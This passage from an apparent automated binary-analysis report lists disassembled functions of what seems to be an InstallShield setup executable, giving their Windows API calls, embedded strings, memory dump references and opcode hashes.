                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$File$CloseCreateException@8HandleThrowWrite_memmove
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2788177597-0
                                                                                                                                                                          • Opcode ID: f8bb48826f1b66e1690944c740aedc980584b964f21647cef04e7fdd88437da7
                                                                                                                                                                          • Instruction ID: c45d509c2fe2222fe7f2e22f3f5bd745226bb6fffc069478bfe817ba126106b2
                                                                                                                                                                          • Opcode Fuzzy Hash: f8bb48826f1b66e1690944c740aedc980584b964f21647cef04e7fdd88437da7
                                                                                                                                                                          • Instruction Fuzzy Hash: 24511B31A01364ABEB25DF25DC95BAEBBBCEB04311F4001AFE509E2181D73C9F408B18
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043227C, Relevance: 12.1, APIs: 8, Instructions: 99libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00432286
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000060,00000424), ref: 004322C5
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 004322DB
                                                                                                                                                                          • FindResourceW.KERNEL32(00000000,?,?), ref: 00432306
                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 0043231E
                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000), ref: 00432330
                                                                                                                                                                            • Part of subcall function 00431868: GetLastError.KERNEL32 ref: 00431868
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004323D4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LibraryLoadResource$ErrorFindFreeH_prolog3_catch_LastSizeof
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1818814483-0
                                                                                                                                                                          • Opcode ID: 4b6d774511196b4f7bb8eb6fda51fb98f3fb3532b3367d0aa56b10fdfbdb3127
                                                                                                                                                                          • Instruction ID: 18e2b466da65482b05baaaf38ba89b121a573677756ea3cea398d78977fe4298
                                                                                                                                                                          • Opcode Fuzzy Hash: 4b6d774511196b4f7bb8eb6fda51fb98f3fb3532b3367d0aa56b10fdfbdb3127
                                                                                                                                                                          • Instruction Fuzzy Hash: 6F4180B09006299BCB219F258D44BDE7AB5EF48310F5081EEF909A3251DB784EC1DF6D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043D058, Relevance: 12.1, APIs: 8, Instructions: 90COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0043D05F
                                                                                                                                                                            • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
                                                                                                                                                                            • Part of subcall function 00455724: __EH_prolog3_GS.LIBCMT ref: 0045572E
                                                                                                                                                                          • LoadImageW.USER32 ref: 0043D0B5
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0043D0E6
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0043D0F7
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0043D0FE
                                                                                                                                                                          • ReleaseDC.USER32 ref: 0043D106
                                                                                                                                                                          • CreateDialogParamW.USER32 ref: 0043D132
                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0043D13C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsDeviceH_prolog3$CreateDialogForegroundH_prolog3_ImageLoadParamReleaseWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2034763720-0
                                                                                                                                                                          • Opcode ID: 3fe15749e4a0d24f6a3cb93ebb78194c3c7ddcaad0d005aee2e099d47ea2de66
                                                                                                                                                                          • Instruction ID: 62da21f4f13d0b11fa62a9c925dc8cac3d14fe0fd66976ceafcb865f57749cd2
                                                                                                                                                                          • Opcode Fuzzy Hash: 3fe15749e4a0d24f6a3cb93ebb78194c3c7ddcaad0d005aee2e099d47ea2de66
                                                                                                                                                                          • Instruction Fuzzy Hash: 5231C271900208AFEB10AF65DC85E9E3BB9FB08354F51853EF859AB291D778DD04CB58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0042880E, Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 294COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_wsprintf
                                                                                                                                                                          • String ID: 1033$Startup$UseDotNetUI
                                                                                                                                                                          • API String ID: 1814582032-2843573423
                                                                                                                                                                          • Opcode ID: bb39905fb8f425178ded4e5acd435821e6bdbc304818d30a8fffb5f9cd8690c1
                                                                                                                                                                          • Instruction ID: 24b7e6cdc75fdaa1419571a9f18967236587b93ff6fb5cb8e25468631c6796ce
                                                                                                                                                                          • Opcode Fuzzy Hash: bb39905fb8f425178ded4e5acd435821e6bdbc304818d30a8fffb5f9cd8690c1
                                                                                                                                                                          • Instruction Fuzzy Hash: CFC18B70A012289FDB24DF68CD81BDDB7B4AF05304F5041EEE149AB292DB789E84CF59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043EDEA, Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 270COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0043EDF4
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 00436124: __EH_prolog3_GS.LIBCMT ref: 0043612B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3_Last
                                                                                                                                                                          • String ID: BuildNo$MajorVer$MinorVer$MinorVerMax$PlatformId
                                                                                                                                                                          • API String ID: 1018228973-1900021638
                                                                                                                                                                          • Opcode ID: c14e964518db706a438fb0c7574dab413fd53a19cd3dc984a3e7a88d6b6f7216
                                                                                                                                                                          • Instruction ID: 2d6b04700e7f207dd771083e90e4ba25fe7fd3e382f249cb3e82a8425f8ac04f
                                                                                                                                                                          • Opcode Fuzzy Hash: c14e964518db706a438fb0c7574dab413fd53a19cd3dc984a3e7a88d6b6f7216
                                                                                                                                                                          • Instruction Fuzzy Hash: 73B13A71D8021AEADB65DF54CC91BEDB7B4AB08318F1041FAA519B61C2EBB85F84CF44
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00434788, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 197COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00434792
                                                                                                                                                                            • Part of subcall function 00437452: __EH_prolog3_GS.LIBCMT ref: 0043745C
                                                                                                                                                                            • Part of subcall function 0043780F: __EH_prolog3_GS.LIBCMT ref: 00437819
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_
                                                                                                                                                                          • String ID: %s=%s$Dumping setup.ini...$Password$Section: %s$session.cpp
                                                                                                                                                                          • API String ID: 2427045233-142721329
                                                                                                                                                                          • Opcode ID: eef0f4ee384f7d01eeb973d34b625b1c03cec776b05ca7c6658c9015e3f7c0ec
                                                                                                                                                                          • Instruction ID: 6e147920d667c45b1193f9cfa4b8c11fed8708b64dc5f7c17d19756e2255ffbe
                                                                                                                                                                          • Opcode Fuzzy Hash: eef0f4ee384f7d01eeb973d34b625b1c03cec776b05ca7c6658c9015e3f7c0ec
                                                                                                                                                                          • Instruction Fuzzy Hash: AE816D70900258DADB24EB61CD95BDDB7B4AF44308F5041AFE00AB71D1EB786F89CB59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00417579, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 178COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00417583
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 00416CC5: __EH_prolog3_GS.LIBCMT ref: 00416CCC
                                                                                                                                                                            • Part of subcall function 0041751D: __EH_prolog3.LIBCMT ref: 00417524
                                                                                                                                                                            • Part of subcall function 0040F686: __EH_prolog3_GS.LIBCMT ref: 0040F690
                                                                                                                                                                            • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 0045A7BA: __EH_prolog3.LIBCMT ref: 0045A7C1
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                            • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
                                                                                                                                                                            • Part of subcall function 0045BCCE: __EH_prolog3_GS.LIBCMT ref: 0045BCD8
                                                                                                                                                                            • Part of subcall function 0040C5CB: __EH_prolog3_GS.LIBCMT ref: 0040C5D2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_$ErrorH_prolog3Last$FreeString
                                                                                                                                                                          • String ID: %ld$.ini$0x%04x$HsG$HsG
                                                                                                                                                                          • API String ID: 4231056545-161451753
                                                                                                                                                                          • Opcode ID: df85160968ec2afca7cc87f43055df440d703c7a15bdb1ab697befc023f127cf
                                                                                                                                                                          • Instruction ID: 0066c2f01c97bf5d5e4a89121c3dca338c79dbd74e81228124df2c0031a3ae6a
                                                                                                                                                                          • Opcode Fuzzy Hash: df85160968ec2afca7cc87f43055df440d703c7a15bdb1ab697befc023f127cf
                                                                                                                                                                          • Instruction Fuzzy Hash: CA718F71C0525CEADB10EBA4CC46BEDBB78AF15304F5440DEE405B7182EBB85B48DBA6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043F1DF, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0043F1E6
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 00436124: __EH_prolog3_GS.LIBCMT ref: 0043612B
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 00411F19: __EH_prolog3_GS.LIBCMT ref: 00411F20
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3_$FreeString
                                                                                                                                                                          • String ID: 1.20.1827.0$CSDVersion$MajorVer$ServicePack$System\CurrentControlSet\Control\Windows
                                                                                                                                                                          • API String ID: 1274762985-3305444093
                                                                                                                                                                          • Opcode ID: a7f68345f08df2eed4eb825750f56187fce42b999a73d211762b2cd56f98bffc
                                                                                                                                                                          • Instruction ID: 08730fe2c2659566450736e7e543f4e1c458b56fe1b396d5e49b4a5f01ea2595
                                                                                                                                                                          • Opcode Fuzzy Hash: a7f68345f08df2eed4eb825750f56187fce42b999a73d211762b2cd56f98bffc
                                                                                                                                                                          • Instruction Fuzzy Hash: D9517D31D00218EADB24DBA1CD92BEDB778BF04314F60416EE501B71D2EBB85A0ACB59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00421862, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 131COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00421869
                                                                                                                                                                            • Part of subcall function 004108DA: __EH_prolog3_GS.LIBCMT ref: 004108E1
                                                                                                                                                                            • Part of subcall function 00416CC5: __EH_prolog3_GS.LIBCMT ref: 00416CCC
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_$ErrorFreeLastString
                                                                                                                                                                          • String ID: TRANSFORMS="$.mst$.mst"$TRANSFORMS=$TRANSFORMS="
                                                                                                                                                                          • API String ID: 2278686355-3238450747
                                                                                                                                                                          • Opcode ID: 4a3ac45a0c0423b1cbd91954adaf2b114a0e9cad415fbb1c2ca40b4aa9be4d8f
                                                                                                                                                                          • Instruction ID: ab54677f7ea1c95f292eb8a47be9da47920c71e5344a175845b19ce0ddb4b80a
                                                                                                                                                                          • Opcode Fuzzy Hash: 4a3ac45a0c0423b1cbd91954adaf2b114a0e9cad415fbb1c2ca40b4aa9be4d8f
                                                                                                                                                                          • Instruction Fuzzy Hash: 9141F471E04214AADB20E7B08D42BEDB6296F91324F64422FF411B72D2DB7C5A49C75D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00417D3F, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 131COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00417D49
                                                                                                                                                                          • _memset.LIBCMT ref: 00417D6C
                                                                                                                                                                          • _memset.LIBCMT ref: 00417D7A
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                          • _wcscpy.LIBCMT ref: 00417DC5
                                                                                                                                                                          • _memset.LIBCMT ref: 00417E05
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memset$ErrorLast$H_prolog3_catch__wcscpy
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 2195959318-4108050209
                                                                                                                                                                          • Opcode ID: 0fa80c86c21885ce2d98244824c64b44b63752911116bcff81b04ba95b653f93
                                                                                                                                                                          • Instruction ID: 9d9db746b3a0da658421d6e1981edbb06a18c15869d50a0518a9d2a420c27662
                                                                                                                                                                          • Opcode Fuzzy Hash: 0fa80c86c21885ce2d98244824c64b44b63752911116bcff81b04ba95b653f93
                                                                                                                                                                          • Instruction Fuzzy Hash: D24164B1D04318AEEB14DBA5CD46BDDBBB8AF04304F1440AFB509E7292E7785E44CB19
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0042D6EC, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0042D6F3
                                                                                                                                                                            • Part of subcall function 00405400: SysFreeString.OLEAUT32(?), ref: 0040540E
                                                                                                                                                                          • GetErrorInfo.OLEAUT32(00000000,00000000,00000014,0042CE29,00000008,0042D281,8007000E,00000124,0042E821,00000001,00000080,0043754C,?,?,00000000,Startup), ref: 0042D727
                                                                                                                                                                          • CLSIDFromProgID.OLE32(00000001,?,?,0000044F,?,00000978,004347AB,000000EC,0041CDEC,0043CC68), ref: 0042D7CD
                                                                                                                                                                          • FormatMessageW.KERNEL32(00001300,00000000,00000005,00000000,00000008,00000000,00000000,?,0000044F,?,00000978,004347AB,000000EC,0041CDEC,0043CC68), ref: 0042D7F3
                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,0000044F,?,00000978,004347AB,000000EC,0041CDEC,0043CC68), ref: 0042D815
                                                                                                                                                                            • Part of subcall function 0041159A: __EH_prolog3.LIBCMT ref: 004115A1
                                                                                                                                                                            • Part of subcall function 004035C0: SysStringLen.OLEAUT32(?), ref: 004035CE
                                                                                                                                                                            • Part of subcall function 004035C0: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 004035E8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
